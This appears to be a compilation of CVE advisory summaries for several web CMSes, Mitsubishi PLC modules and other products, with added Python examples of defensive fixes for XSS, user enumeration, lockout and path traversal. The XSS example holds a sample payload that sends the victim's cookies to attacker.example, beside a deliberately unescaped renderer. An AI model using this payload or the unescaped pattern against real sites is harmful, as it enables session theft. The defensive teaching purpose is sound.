CVE-2020-18693
Cross Site Scripting (XSS) in MineWebCMS v1.7.0 allows remote attackers to execute arbitrary web script or HTML in the browser of a user who views the affected page by injecting malicious code into the ‘Title’ field of the ‘/admin/news’ component.
Source: CVE-2020-18693
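The defect class behind CVE-2020-18693 is a stored value (the news ‘Title’) being interpolated into HTML without output encoding. The following is an added illustration, not MineWebCMS code: it renders a constructed payload through an unencoded template and through one that HTML-encodes the title first, so the difference is visible in the output. The payload, field names and helper names are assumptions for the example.

```python
import html

# Constructed sample input: the kind of value an attacker would submit in a
# 'Title' field. Illustrative only, not taken from the advisory.
MALICIOUS_TITLE = (
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
)


def render_title_vulnerable(title: str) -> str:
    """Interpolate the stored title into HTML verbatim (the stored-XSS pattern)."""
    return f'<h2 class="news-title">{title}</h2>'


def render_title_safe(title: str) -> str:
    """Encode &, <, >, " and ' before interpolation (HTML body/attribute context)."""
    return f'<h2 class="news-title">{html.escape(title, quote=True)}</h2>'


def contains_active_markup(rendered: str) -> bool:
    """Crude indicator used only to contrast the two renderers above."""
    lowered = rendered.lower()
    return "<script" in lowered or "onerror=" in lowered or "javascript:" in lowered


if __name__ == "__main__":
    print(render_title_vulnerable(MALICIOUS_TITLE))
    print(render_title_safe(MALICIOUS_TITLE))
```

`html.escape` is correct for text placed in an HTML element body or a quoted attribute; a title that ends up inside a `<script>` block, a URL, or an inline event handler needs the encoding for that context instead, and the safest fix in a PHP application of this kind is to do the encoding at every output point (e.g. `htmlspecialchars` with `ENT_QUOTES`) rather than to filter the stored value.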
CVE-2020-18694
Cross Site Request Forgery (CSRF) in IgnitedCMS v1.0 allows remote attackers to obtain sensitive information and gain privileges via the component "/admin/profile/save_profile".
Source: CVE-2020-18694
CVE-2021-20597
Insufficiently Protected Credentials vulnerability in Mitsubishi Electric MELSEC iQ-R series CPU modules (R08/16/32/120SFCPU all versions, R08/16/32/120PSFCPU all versions) allows a remote unauthenticated attacker to log in to the target without authorization by sniffing network traffic and obtaining credentials while user information is being registered in the target or a password is being changed.
Source: CVE-2021-20597
CVE-2021-36795
A permission issue in the Cohesity Linux agent may allow privilege escalation in versions 6.5.1b to 6.5.1d-hotfix10 and 6.6.0a to 6.6.0b-hotfix1. A low-privileged Linux user can gain additional privileges if certain environment criteria are met.
Source: CVE-2021-36795
CVE-2021-20598
Overly Restrictive Account Lockout Mechanism vulnerability in Mitsubishi Electric MELSEC iQ-R series CPU modules (R08/16/32/120SFCPU all versions, R08/16/32/120PSFCPU all versions) allows a remote unauthenticated attacker to lock out a legitimate user by repeatedly attempting to log in with an incorrect password.
Source: CVE-2021-20598
CVE-2021-20594
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Mitsubishi Electric MELSEC iQ-R series CPU modules (R08/16/32/120SFCPU all versions, R08/16/32/120PSFCPU all versions) allows a remote unauthenticated attacker to enumerate legitimate user names registered in the module by brute-forcing user names.
Source: CVE-2021-20594
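CVE-2021-20598 and CVE-2021-20594 are two sides of one login-design problem: a failed login must not reveal whether the user name exists, and the response to repeated failures must not hand an unauthenticated attacker a way to lock the real user out. The following is an added illustration of a login handler that satisfies both properties; it is ordinary Python, not MELSEC firmware or any Mitsubishi Electric code, and the user database, salt, thresholds and source addresses are constructed for the example. The handler returns the same generic failure for an unknown user and a wrong password, always performs the password comparison so the timing is uniform, and throttles by source address for a sliding window instead of locking the account.

```python
import hashlib
import hmac
import time
from collections import defaultdict

# Constructed credential store: user name -> PBKDF2 hash. Illustrative only.
_SALT = b"example-salt"
_ITERATIONS = 50_000


def _hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"engineer": _hash_password("correct horse")}

# Hash compared against for unknown user names so the work done (and the
# response) is the same whether or not the name exists.
_DUMMY_HASH = _hash_password("not-a-real-password")

GENERIC_FAILURE = "authentication failed"


class Authenticator:
    def __init__(self, max_failures: int = 5, window_seconds: float = 60.0):
        self.max_failures = max_failures
        self.window = window_seconds
        # Failures are tracked per source address, never per account, so an
        # attacker can only throttle themselves (CVE-2021-20598 pattern avoided).
        self._failures = defaultdict(list)

    def _throttled(self, source: str, now: float) -> bool:
        recent = [t for t in self._failures[source] if now - t < self.window]
        self._failures[source] = recent
        return len(recent) >= self.max_failures

    def login(self, source: str, username: str, password: str, now=None):
        now = time.monotonic() if now is None else now
        if self._throttled(source, now):
            return (False, GENERIC_FAILURE)
        stored = USERS.get(username, _DUMMY_HASH)
        # Compare unconditionally; short-circuiting on "unknown user" would
        # leak the user name through response timing (CVE-2021-20594 pattern).
        matches = hmac.compare_digest(stored, _hash_password(password))
        if username in USERS and matches:
            return (True, "ok")
        self._failures[source].append(now)
        return (False, GENERIC_FAILURE)
```

A device cannot distinguish sources behind a single NAT address, so per-source throttling is usually paired with a rate limit per account that slows responses rather than refusing them outright; the property to check in a review is that no sequence of unauthenticated requests can make a correct password fail indefinitely.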
CVE-2021-36455
SQL Injection vulnerability in Naviwebs Navigate CMS 2.9 via the quicksearch parameter in lib/packages/comments/comments.php.
Source: CVE-2021-36455
CVE-2021-36454
Cross Site Scripting (XSS) vulnerability in Naviwebs Navigate Cms 2.9 via the navigate-quickse parameter to 1) backups/backups.php, 2) blocks/blocks.php, 3) brands/brands.php, 4) comments/comments.php, 5) coupons/coupons.php, 6) feeds/feeds.php, 7) functions/functions.php, 8) items/items.php, 9) menus/menus.php, 10) orders/orders.php, 11) payment_methods/payment_methods.php, 12) products/products.php, 13) profiles/profiles.php, 14) shipping_methods/shipping_methods.php, 15) templates/templates.php, 16) users/users.php, 17) webdictionary/webdictionary.php, 18) websites/websites.php, and 19) webusers/webusers.php, because the initial_url function is built in these files.
Source: CVE-2021-36454
CVE-2021-38137
Corero SecureWatch Managed Services 9.7.2.0020 does not correctly check the privileges of the swa-monitor and cns-monitor users, allowing such a user to perform actions outside their role.
Source: CVE-2021-38137
CVE-2021-38136
Corero SecureWatch Managed Services 9.7.2.0020 is affected by a Path Traversal vulnerability via the snap_file parameter in the /it-IT/splunkd/__raw/services/get_snapshot HTTP API endpoint. A ‘low privileged’ attacker can read any file on the target host.
Source: CVE-2021-38136
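CVE-2021-38136 is a file-name parameter (`snap_file`) that is joined to a directory without confirming that the result stays inside it. The following is an added illustration of the check that closes that class of bug; it is not Corero or Splunk code, and the directory layout, file names and helper names are constructed for the example. The resolver rejects absolute paths and NUL bytes, canonicalises the joined path with `os.path.realpath` (which collapses `..` and follows symlinks), and then proves containment with `os.path.commonpath` rather than with a string-prefix comparison.

```python
import os
import tempfile


def resolve_snapshot_path(base_dir: str, requested: str) -> str:
    """Return the canonical path of `requested` inside `base_dir`, or raise ValueError."""
    base = os.path.realpath(base_dir)
    # os.path.join discards `base` entirely when `requested` is absolute, so
    # reject that up front, along with empty names and embedded NUL bytes.
    if not requested or "\x00" in requested or os.path.isabs(requested):
        raise ValueError("invalid snapshot name")
    candidate = os.path.realpath(os.path.join(base, requested))
    # A prefix test on the raw string would accept '/srv/snapshots-other/x';
    # commonpath compares whole path components.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes snapshot directory")
    return candidate


def is_safe_snapshot_name(base_dir: str, requested: str) -> bool:
    """Boolean wrapper around resolve_snapshot_path for use in tests and filters."""
    try:
        resolve_snapshot_path(base_dir, requested)
        return True
    except ValueError:
        return False


def read_snapshot(base_dir: str, requested: str) -> bytes:
    """The hardened form of 'open the file named by snap_file'."""
    with open(resolve_snapshot_path(base_dir, requested), "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Build a constructed directory tree and exercise the resolver against it."""
    with tempfile.TemporaryDirectory() as root:
        snapshots = os.path.join(root, "snapshots")
        os.mkdir(snapshots)
        with open(os.path.join(snapshots, "daily.snap"), "wb") as fh:
            fh.write(b"constructed snapshot contents")
        with open(os.path.join(root, "secret.txt"), "wb") as fh:
            fh.write(b"must not be readable via snap_file")
        return {
            "legit": read_snapshot(snapshots, "daily.snap"),
            "traversal_blocked": not is_safe_snapshot_name(snapshots, "../secret.txt"),
            "absolute_blocked": not is_safe_snapshot_name(
                snapshots, os.path.join(root, "secret.txt")
            ),
            "subdir_ok": is_safe_snapshot_name(snapshots, "archive/2021-08.snap"),
        }


if __name__ == "__main__":
    print(demo())
```

Because `realpath` follows symlinks, a symlink inside the snapshot directory that points outside it is rejected as well; if the application legitimately relies on such links, the check has to be made against the target directory instead, which is a decision to make explicitly rather than by accident.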